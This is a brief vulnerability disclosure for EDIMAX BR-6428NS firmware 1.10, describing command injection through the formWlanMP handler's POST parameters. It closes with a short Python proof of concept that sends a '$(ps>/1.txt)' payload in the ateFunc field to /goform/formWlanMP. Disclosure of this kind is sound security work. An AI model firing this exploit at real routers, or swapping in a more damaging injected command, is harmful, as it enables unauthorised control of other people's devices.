BR-6428NS_v4_1.10
The EDIMAX BR-6428NS_v4_1.10 firmware has a command injection vulnerability in the formWlanMP function. The Var/v29/v26/v27/v28/v20/v42/v41/v40/v39/v38/v2/v3/v4/v5/v6/v37/v36/v35/v16/v34/v33/v32/v43/v25/v24/v23/v21/v22/v17 variables receive the ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P parameters from a POST request. . However, since the user can control the input of these variables, the statement system() can cause a command injection.
import requests
ip = "192.168.2.1"
payload = "$(ps>/1.txt)"
data = {"ateFunc": payload}
url = f'http://{ip}/goform/formWlanMP'
res = requests.post(url=url, data=data, verify=False)
print(res)
